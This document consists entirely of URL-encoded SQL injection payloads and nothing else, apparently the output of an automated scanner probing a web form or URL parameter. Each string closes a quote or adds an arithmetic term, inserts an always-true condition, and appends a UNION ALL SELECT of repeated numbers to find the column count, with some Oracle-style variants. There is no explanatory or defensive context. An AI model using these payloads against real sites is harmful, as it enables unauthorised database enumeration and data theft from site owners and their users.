-7669%27%20WHERE%203787%3D3787%20UNION%20ALL%20SELECT%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787%2C%203787--%20 -7632%27%20WHERE%201587%3D1587%20UNION%20ALL%20SELECT%201587%2C%201587%2C%201587%2C%201587%2C%201587%2C%201587%2C%201587%2C%201587%2C%201587%2C%201587%2C%201587%2C%201587%2C%201587%2C%201587%2C%201587%2C%201587%2C%201587%2C%201587%2C%201587%2C%201587%2C%201587%2C%201587%2C%201587%2C%201587%2C%201587%2C%201587%2C%201587%2C%201587%2C%201587%2C%201587%2C%201587%2C%201587%2C%201587%2C%201587%2C%201587%2C%201587%2C%201587%2C%201587%2C%201587%2C%201587%2C%201587%2C%201587%2C%201587%2C%201587%2C%201587%2C%201587%2C%201587%2C%201587--%20 -9330%27%20WHERE%206148%3D6148%20UNION%20ALL%20SELECT%206148%2C%206148%2C%206148%2C%206148%2C%206148%2C%206148%2C%206148%2C%206148%2C%206148%2C%206148%2C%206148%2C%206148%2C%206148%2C%206148%2C%206148%2C%206148%2C%206148%2C%206148%2C%206148%2C%206148%2C%206148%2C%206148%2C%206148%2C%206148%2C%206148%2C%206148%2C%206148%2C%206148%2C%206148%2C%206148%2C%206148%2C%206148%2C%206148%2C%206148%2C%206148%2C%206148%2C%206148%2C%206148%2C%206148%2C%206148%2C%206148%2C%206148%2C%206148%2C%206148%2C%206148%2C%206148%2C%206148%2C%206148%2C%206148--%20 -7459%27%20WHERE%203527%3D3527%20UNION%20ALL%20SELECT%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527--%20 -1631%22%20WHERE%203055%3D3055%20UNION%20ALL%20SELECT%203055%2C%203055%2C%203055%2C%203055%2C%203055%2C%203055%2C%203055%2C%203055%2C%203055%2C%203055%2C%203055%2C%203055%2C%203055%2C%203055%2C%203055%2C%203055%2C%203055%2C%203055%2C%203055%2C%203055%2C%203055%2C%203055%2C%203055%2C%203055%2C%203055%2C%203055%2C%203055%2C%203055%2C%203055%2C%203055%2C%203055%2C%203055%2C%203055%2C%203055%2C%203055%2C%203055%2C%203055%2C%203055%2C%203055%2C%203055%2C%203055--%20 -9433%22%20WHERE%204779%3D4779%20UNION%20ALL%20SELECT%204779%2C%204779%2C%204779%2C%204779%2C%204779%2C%204779%2C%204779%2C%204779%2C%204779%2C%204779%2C%204779%2C%204779%2C%204779%2C%204779%2C%204779%2C%204779%2C%204779%2C%204779%2C%204779%2C%204779%2C%204779%2C%204779%2C%204779%2C%204779%2C%204779%2C%204779%2C%204779%2C%204779%2C%204779%2C%204779%2C%204779%2C%204779%2C%204779%2C%204779%2C%204779%2C%204779%2C%204779%2C%204779%2C%204779%2C%204779%2C%204779%2C%204779--%20 -5505%22%20WHERE%206063%3D6063%20UNION%20ALL%20SELECT%206063%2C%206063%2C%206063%2C%206063%2C%206063%2C%206063%2C%206063%2C%206063%2C%206063%2C%206063%2C%206063%2C%206063%2C%206063%2C%206063%2C%206063%2C%206063%2C%206063%2C%206063%2C%206063%2C%206063%2C%206063%2C%206063%2C%206063%2C%206063%2C%206063%2C%206063%2C%206063%2C%206063%2C%206063%2C%206063%2C%206063%2C%206063%2C%206063%2C%206063%2C%206063%2C%206063%2C%206063%2C%206063%2C%206063%2C%206063%2C%206063%2C%206063%2C%206063--%20 -3030%22%20WHERE%204898%3D4898%20UNION%20ALL%20SELECT%204898%2C%204898%2C%204898%2C%204898%2C%204898%2C%204898%2C%204898%2C%204898%2C%204898%2C%204898%2C%204898%2C%204898%2C%204898%2C%204898%2C%204898%2C%204898%2C%204898%2C%204898%2C%204898%2C%204898%2C%204898%2C%204898%2C%204898%2C%204898%2C%204898%2C%204898%2C%204898%2C%204898%2C%204898%2C%204898%2C%204898%2C%204898%2C%204898%2C%204898%2C%204898%2C%204898%2C%204898%2C%204898%2C%204898%2C%204898%2C%204898%2C%204898%2C%204898%2C%204898--%20 -8035%22%20WHERE%207647%3D7647%20UNION%20ALL%20SELECT%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647--%20 -8893%22%20WHERE%206303%3D6303%20UNION%20ALL%20SELECT%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303--%20 -3389%22%20WHERE%204799%3D4799%20UNION%20ALL%20SELECT%204799%2C%204799%2C%204799%2C%204799%2C%204799%2C%204799%2C%204799%2C%204799%2C%204799%2C%204799%2C%204799%2C%204799%2C%204799%2C%204799%2C%204799%2C%204799%2C%204799%2C%204799%2C%204799%2C%204799%2C%204799%2C%204799%2C%204799%2C%204799%2C%204799%2C%204799%2C%204799%2C%204799%2C%204799%2C%204799%2C%204799%2C%204799%2C%204799%2C%204799%2C%204799%2C%204799%2C%204799%2C%204799%2C%204799%2C%204799%2C%204799%2C%204799%2C%204799%2C%204799%2C%204799%2C%204799%2C%204799--%20 -4215%22%20WHERE%201667%3D1667%20UNION%20ALL%20SELECT%201667%2C%201667%2C%201667%2C%201667%2C%201667%2C%201667%2C%201667%2C%201667%2C%201667%2C%201667%2C%201667%2C%201667%2C%201667%2C%201667%2C%201667%2C%201667%2C%201667%2C%201667%2C%201667%2C%201667%2C%201667%2C%201667%2C%201667%2C%201667%2C%201667%2C%201667%2C%201667%2C%201667%2C%201667%2C%201667%2C%201667%2C%201667%2C%201667%2C%201667%2C%201667%2C%201667%2C%201667%2C%201667%2C%201667%2C%201667%2C%201667%2C%201667%2C%201667%2C%201667%2C%201667%2C%201667%2C%201667%2C%201667--%20 -3089%22%20WHERE%203668%3D3668%20UNION%20ALL%20SELECT%203668%2C%203668%2C%203668%2C%203668%2C%203668%2C%203668%2C%203668%2C%203668%2C%203668%2C%203668%2C%203668%2C%203668%2C%203668%2C%203668%2C%203668%2C%203668%2C%203668%2C%203668%2C%203668%2C%203668%2C%203668%2C%203668%2C%203668%2C%203668%2C%203668%2C%203668%2C%203668%2C%203668%2C%203668%2C%203668%2C%203668%2C%203668%2C%203668%2C%203668%2C%203668%2C%203668%2C%203668%2C%203668%2C%203668%2C%203668%2C%203668%2C%203668%2C%203668%2C%203668%2C%203668%2C%203668%2C%203668%2C%203668%2C%203668--%20 -1907%22%20WHERE%208752%3D8752%20UNION%20ALL%20SELECT%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752%2C%208752--%20 -3061%27%20%7C%7C%20%28SELECT%202305%20FROM%20DUAL%20WHERE%201021%3D1021%20UNION%20ALL%20SELECT%201021%2C%201021%2C%201021%2C%201021%2C%201021%2C%201021%2C%201021%2C%201021%2C%201021%2C%201021%2C%201021%2C%201021%2C%201021%2C%201021%2C%201021%2C%201021%2C%201021%2C%201021%2C%201021%2C%201021%2C%201021%2C%201021%2C%201021%2C%201021%2C%201021%2C%201021%2C%201021%2C%201021%2C%201021%2C%201021%2C%201021%2C%201021%2C%201021%2C%201021%2C%201021%2C%201021%2C%201021%2C%201021%2C%201021%2C%201021%2C%201021--%20%20%29%20%7C%7C%20%27 -2350%27%20%7C%7C%20%28SELECT%207727%20FROM%20DUAL%20WHERE%208007%3D8007%20UNION%20ALL%20SELECT%208007%2C%208007%2C%208007%2C%208007%2C%208007%2C%208007%2C%208007%2C%208007%2C%208007%2C%208007%2C%208007%2C%208007%2C%208007%2C%208007%2C%208007%2C%208007%2C%208007%2C%208007%2C%208007%2C%208007%2C%208007%2C%208007%2C%208007%2C%208007%2C%208007%2C%208007%2C%208007%2C%208007%2C%208007%2C%208007%2C%208007%2C%208007%2C%208007%2C%208007%2C%208007%2C%208007%2C%208007%2C%208007%2C%208007%2C%208007%2C%208007%2C%208007--%20%20%29%20%7C%7C%20%27 -1996%27%20%7C%7C%20%28SELECT%209669%20FROM%20DUAL%20WHERE%204523%3D4523%20UNION%20ALL%20SELECT%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523%2C%204523--%20%20%29%20%7C%7C%20%27 -6453%27%20%7C%7C%20%28SELECT%209732%20FROM%20DUAL%20WHERE%201738%3D1738%20UNION%20ALL%20SELECT%201738%2C%201738%2C%201738%2C%201738%2C%201738%2C%201738%2C%201738%2C%201738%2C%201738%2C%201738%2C%201738%2C%201738%2C%201738%2C%201738%2C%201738%2C%201738%2C%201738%2C%201738%2C%201738%2C%201738%2C%201738%2C%201738%2C%201738%2C%201738%2C%201738%2C%201738%2C%201738%2C%201738%2C%201738%2C%201738%2C%201738%2C%201738%2C%201738%2C%201738%2C%201738%2C%201738%2C%201738%2C%201738%2C%201738%2C%201738%2C%201738%2C%201738%2C%201738%2C%201738--%20%20%29%20%7C%7C%20%27 -1856%27%20%7C%7C%20%28SELECT%207082%20FROM%20DUAL%20WHERE%209097%3D9097%20UNION%20ALL%20SELECT%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097%2C%209097--%20%20%29%20%7C%7C%20%27 -3274%27%20%7C%7C%20%28SELECT%208572%20FROM%20DUAL%20WHERE%204950%3D4950%20UNION%20ALL%20SELECT%204950%2C%204950%2C%204950%2C%204950%2C%204950%2C%204950%2C%204950%2C%204950%2C%204950%2C%204950%2C%204950%2C%204950%2C%204950%2C%204950%2C%204950%2C%204950%2C%204950%2C%204950%2C%204950%2C%204950%2C%204950%2C%204950%2C%204950%2C%204950%2C%204950%2C%204950%2C%204950%2C%204950%2C%204950%2C%204950%2C%204950%2C%204950%2C%204950%2C%204950%2C%204950%2C%204950%2C%204950%2C%204950%2C%204950%2C%204950%2C%204950%2C%204950%2C%204950%2C%204950%2C%204950%2C%204950--%20%20%29%20%7C%7C%20%27 -4848%27%20%7C%7C%20%28SELECT%208930%20FROM%20DUAL%20WHERE%206787%3D6787%20UNION%20ALL%20SELECT%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787--%20%20%29%20%7C%7C%20%27 -5923%27%20%7C%7C%20%28SELECT%201478%20FROM%20DUAL%20WHERE%209034%3D9034%20UNION%20ALL%20SELECT%209034%2C%209034%2C%209034%2C%209034%2C%209034%2C%209034%2C%209034%2C%209034%2C%209034%2C%209034%2C%209034%2C%209034%2C%209034%2C%209034%2C%209034%2C%209034%2C%209034%2C%209034%2C%209034%2C%209034%2C%209034%2C%209034%2C%209034%2C%209034%2C%209034%2C%209034%2C%209034%2C%209034%2C%209034%2C%209034%2C%209034%2C%209034%2C%209034%2C%209034%2C%209034%2C%209034%2C%209034%2C%209034%2C%209034%2C%209034%2C%209034%2C%209034%2C%209034%2C%209034%2C%209034%2C%209034%2C%209034%2C%209034--%20%20%29%20%7C%7C%20%27 -9709%27%20%7C%7C%20%28SELECT%204141%20FROM%20DUAL%20WHERE%208507%3D8507%20UNION%20ALL%20SELECT%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507%2C%208507--%20%20%29%20%7C%7C%20%27 -1643%27%20%7C%7C%20%28SELECT%206347%20FROM%20DUAL%20WHERE%205098%3D5098%20UNION%20ALL%20SELECT%205098%2C%205098%2C%205098%2C%205098%2C%205098%2C%205098%2C%205098%2C%205098%2C%205098%2C%205098%2C%205098%2C%205098%2C%205098%2C%205098%2C%205098%2C%205098%2C%205098%2C%205098%2C%205098%2C%205098%2C%205098%2C%205098%2C%205098%2C%205098%2C%205098%2C%205098%2C%205098%2C%205098%2C%205098%2C%205098%2C%205098%2C%205098%2C%205098%2C%205098%2C%205098%2C%205098%2C%205098%2C%205098%2C%205098%2C%205098%2C%205098%2C%205098%2C%205098%2C%205098%2C%205098%2C%205098%2C%205098%2C%205098%2C%205098%2C%205098--%20%20%29%20%7C%7C%20%27 -4922%27%20%7C%7C%20%28SELECT%204510%20WHERE%207568%3D7568%20UNION%20ALL%20SELECT%207568%2C%207568%2C%207568%2C%207568%2C%207568%2C%207568%2C%207568%2C%207568%2C%207568%2C%207568%2C%207568%2C%207568%2C%207568%2C%207568%2C%207568%2C%207568%2C%207568%2C%207568%2C%207568%2C%207568%2C%207568%2C%207568%2C%207568%2C%207568%2C%207568%2C%207568%2C%207568%2C%207568%2C%207568%2C%207568%2C%207568%2C%207568%2C%207568%2C%207568%2C%207568%2C%207568%2C%207568%2C%207568%2C%207568%2C%207568%2C%207568--%20%20%29%20%7C%7C%20%27 -1974%27%20%7C%7C%20%28SELECT%205663%20WHERE%204445%3D4445%20UNION%20ALL%20SELECT%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445%2C%204445--%20%20%29%20%7C%7C%20%27 -2331%27%20%7C%7C%20%28SELECT%205009%20WHERE%207287%3D7287%20UNION%20ALL%20SELECT%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287--%20%20%29%20%7C%7C%20%27 -9528%27%20%7C%7C%20%28SELECT%204978%20WHERE%209877%3D9877%20UNION%20ALL%20SELECT%209877%2C%209877%2C%209877%2C%209877%2C%209877%2C%209877%2C%209877%2C%209877%2C%209877%2C%209877%2C%209877%2C%209877%2C%209877%2C%209877%2C%209877%2C%209877%2C%209877%2C%209877%2C%209877%2C%209877%2C%209877%2C%209877%2C%209877%2C%209877%2C%209877%2C%209877%2C%209877%2C%209877%2C%209877%2C%209877%2C%209877%2C%209877%2C%209877%2C%209877%2C%209877%2C%209877%2C%209877%2C%209877%2C%209877%2C%209877%2C%209877%2C%209877%2C%209877%2C%209877--%20%20%29%20%7C%7C%20%27 -6406%27%20%7C%7C%20%28SELECT%206705%20WHERE%209443%3D9443%20UNION%20ALL%20SELECT%209443%2C%209443%2C%209443%2C%209443%2C%209443%2C%209443%2C%209443%2C%209443%2C%209443%2C%209443%2C%209443%2C%209443%2C%209443%2C%209443%2C%209443%2C%209443%2C%209443%2C%209443%2C%209443%2C%209443%2C%209443%2C%209443%2C%209443%2C%209443%2C%209443%2C%209443%2C%209443%2C%209443%2C%209443%2C%209443%2C%209443%2C%209443%2C%209443%2C%209443%2C%209443%2C%209443%2C%209443%2C%209443%2C%209443%2C%209443%2C%209443%2C%209443%2C%209443%2C%209443%2C%209443--%20%20%29%20%7C%7C%20%27 -6621%27%20%7C%7C%20%28SELECT%206553%20WHERE%207488%3D7488%20UNION%20ALL%20SELECT%207488%2C%207488%2C%207488%2C%207488%2C%207488%2C%207488%2C%207488%2C%207488%2C%207488%2C%207488%2C%207488%2C%207488%2C%207488%2C%207488%2C%207488%2C%207488%2C%207488%2C%207488%2C%207488%2C%207488%2C%207488%2C%207488%2C%207488%2C%207488%2C%207488%2C%207488%2C%207488%2C%207488%2C%207488%2C%207488%2C%207488%2C%207488%2C%207488%2C%207488%2C%207488%2C%207488%2C%207488%2C%207488%2C%207488%2C%207488%2C%207488%2C%207488%2C%207488%2C%207488%2C%207488%2C%207488--%20%20%29%20%7C%7C%20%27 -8534%27%20%7C%7C%20%28SELECT%201317%20WHERE%202954%3D2954%20UNION%20ALL%20SELECT%202954%2C%202954%2C%202954%2C%202954%2C%202954%2C%202954%2C%202954%2C%202954%2C%202954%2C%202954%2C%202954%2C%202954%2C%202954%2C%202954%2C%202954%2C%202954%2C%202954%2C%202954%2C%202954%2C%202954%2C%202954%2C%202954%2C%202954%2C%202954%2C%202954%2C%202954%2C%202954%2C%202954%2C%202954%2C%202954%2C%202954%2C%202954%2C%202954%2C%202954%2C%202954%2C%202954%2C%202954%2C%202954%2C%202954%2C%202954%2C%202954%2C%202954%2C%202954%2C%202954%2C%202954%2C%202954%2C%202954--%20%20%29%20%7C%7C%20%27 -8078%27%20%7C%7C%20%28SELECT%201127%20WHERE%207097%3D7097%20UNION%20ALL%20SELECT%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097%2C%207097--%20%20%29%20%7C%7C%20%27 -9063%27%20%7C%7C%20%28SELECT%202048%20WHERE%203952%3D3952%20UNION%20ALL%20SELECT%203952%2C%203952%2C%203952%2C%203952%2C%203952%2C%203952%2C%203952%2C%203952%2C%203952%2C%203952%2C%203952%2C%203952%2C%203952%2C%203952%2C%203952%2C%203952%2C%203952%2C%203952%2C%203952%2C%203952%2C%203952%2C%203952%2C%203952%2C%203952%2C%203952%2C%203952%2C%203952%2C%203952%2C%203952%2C%203952%2C%203952%2C%203952%2C%203952%2C%203952%2C%203952%2C%203952%2C%203952%2C%203952%2C%203952%2C%203952%2C%203952%2C%203952%2C%203952%2C%203952%2C%203952%2C%203952%2C%203952%2C%203952%2C%203952--%20%20%29%20%7C%7C%20%27 -2727%27%20%7C%7C%20%28SELECT%201219%20WHERE%206547%3D6547%20UNION%20ALL%20SELECT%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547--%20%20%29%20%7C%7C%20%27 -8807%20%2B%20%28SELECT%209893%20FROM%20DUAL%20WHERE%204833%3D4833%20UNION%20ALL%20SELECT%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833--%20%20%29 -2415%20%2B%20%28SELECT%209588%20FROM%20DUAL%20WHERE%209144%3D9144%20UNION%20ALL%20SELECT%209144%2C%209144%2C%209144%2C%209144%2C%209144%2C%209144%2C%209144%2C%209144%2C%209144%2C%209144%2C%209144%2C%209144%2C%209144%2C%209144%2C%209144%2C%209144%2C%209144%2C%209144%2C%209144%2C%209144%2C%209144%2C%209144%2C%209144%2C%209144%2C%209144%2C%209144%2C%209144%2C%209144%2C%209144%2C%209144%2C%209144%2C%209144%2C%209144%2C%209144%2C%209144%2C%209144%2C%209144%2C%209144%2C%209144%2C%209144%2C%209144%2C%209144--%20%20%29 -7635%20%2B%20%28SELECT%209485%20FROM%20DUAL%20WHERE%202660%3D2660%20UNION%20ALL%20SELECT%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660%2C%202660--%20%20%29 -5772%20%2B%20%28SELECT%203524%20FROM%20DUAL%20WHERE%208117%3D8117%20UNION%20ALL%20SELECT%208117%2C%208117%2C%208117%2C%208117%2C%208117%2C%208117%2C%208117%2C%208117%2C%208117%2C%208117%2C%208117%2C%208117%2C%208117%2C%208117%2C%208117%2C%208117%2C%208117%2C%208117%2C%208117%2C%208117%2C%208117%2C%208117%2C%208117%2C%208117%2C%208117%2C%208117%2C%208117%2C%208117%2C%208117%2C%208117%2C%208117%2C%208117%2C%208117%2C%208117%2C%208117%2C%208117%2C%208117%2C%208117%2C%208117%2C%208117%2C%208117%2C%208117%2C%208117%2C%208117--%20%20%29 -5359%20%2B%20%28SELECT%208782%20FROM%20DUAL%20WHERE%206650%3D6650%20UNION%20ALL%20SELECT%206650%2C%206650%2C%206650%2C%206650%2C%206650%2C%206650%2C%206650%2C%206650%2C%206650%2C%206650%2C%206650%2C%206650%2C%206650%2C%206650%2C%206650%2C%206650%2C%206650%2C%206650%2C%206650%2C%206650%2C%206650%2C%206650%2C%206650%2C%206650%2C%206650%2C%206650%2C%206650%2C%206650%2C%206650%2C%206650%2C%206650%2C%206650%2C%206650%2C%206650%2C%206650%2C%206650%2C%206650%2C%206650%2C%206650%2C%206650%2C%206650%2C%206650%2C%206650%2C%206650%2C%206650--%20%20%29 -7915%20%2B%20%28SELECT%201604%20FROM%20DUAL%20WHERE%207392%3D7392%20UNION%20ALL%20SELECT%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392--%20%20%29 -8727%20%2B%20%28SELECT%203059%20FROM%20DUAL%20WHERE%201631%3D1631%20UNION%20ALL%20SELECT%201631%2C%201631%2C%201631%2C%201631%2C%201631%2C%201631%2C%201631%2C%201631%2C%201631%2C%201631%2C%201631%2C%201631%2C%201631%2C%201631%2C%201631%2C%201631%2C%201631%2C%201631%2C%201631%2C%201631%2C%201631%2C%201631%2C%201631%2C%201631%2C%201631%2C%201631%2C%201631%2C%201631%2C%201631%2C%201631%2C%201631%2C%201631%2C%201631%2C%201631%2C%201631%2C%201631%2C%201631%2C%201631%2C%201631%2C%201631%2C%201631%2C%201631%2C%201631%2C%201631%2C%201631%2C%201631%2C%201631--%20%20%29 -6190%20%2B%20%28SELECT%202373%20FROM%20DUAL%20WHERE%204161%3D4161%20UNION%20ALL%20SELECT%204161%2C%204161%2C%204161%2C%204161%2C%204161%2C%204161%2C%204161%2C%204161%2C%204161%2C%204161%2C%204161%2C%204161%2C%204161%2C%204161%2C%204161%2C%204161%2C%204161%2C%204161%2C%204161%2C%204161%2C%204161%2C%204161%2C%204161%2C%204161%2C%204161%2C%204161%2C%204161%2C%204161%2C%204161%2C%204161%2C%204161%2C%204161%2C%204161%2C%204161%2C%204161%2C%204161%2C%204161%2C%204161%2C%204161%2C%204161%2C%204161%2C%204161%2C%204161%2C%204161%2C%204161%2C%204161%2C%204161%2C%204161--%20%20%29 -9122%20%2B%20%28SELECT%204653%20FROM%20DUAL%20WHERE%202517%3D2517%20UNION%20ALL%20SELECT%202517%2C%202517%2C%202517%2C%202517%2C%202517%2C%202517%2C%202517%2C%202517%2C%202517%2C%202517%2C%202517%2C%202517%2C%202517%2C%202517%2C%202517%2C%202517%2C%202517%2C%202517%2C%202517%2C%202517%2C%202517%2C%202517%2C%202517%2C%202517%2C%202517%2C%202517%2C%202517%2C%202517%2C%202517%2C%202517%2C%202517%2C%202517%2C%202517%2C%202517%2C%202517%2C%202517%2C%202517%2C%202517%2C%202517%2C%202517%2C%202517%2C%202517%2C%202517%2C%202517%2C%202517%2C%202517%2C%202517%2C%202517%2C%202517--%20%20%29 -6967%20%2B%20%28SELECT%203486%20FROM%20DUAL%20WHERE%206232%3D6232%20UNION%20ALL%20SELECT%206232%2C%206232%2C%206232%2C%206232%2C%206232%2C%206232%2C%206232%2C%206232%2C%206232%2C%206232%2C%206232%2C%206232%2C%206232%2C%206232%2C%206232%2C%206232%2C%206232%2C%206232%2C%206232%2C%206232%2C%206232%2C%206232%2C%206232%2C%206232%2C%206232%2C%206232%2C%206232%2C%206232%2C%206232%2C%206232%2C%206232%2C%206232%2C%206232%2C%206232%2C%206232%2C%206232%2C%206232%2C%206232%2C%206232%2C%206232%2C%206232%2C%206232%2C%206232%2C%206232%2C%206232%2C%206232%2C%206232%2C%206232%2C%206232%2C%206232--%20%20%29 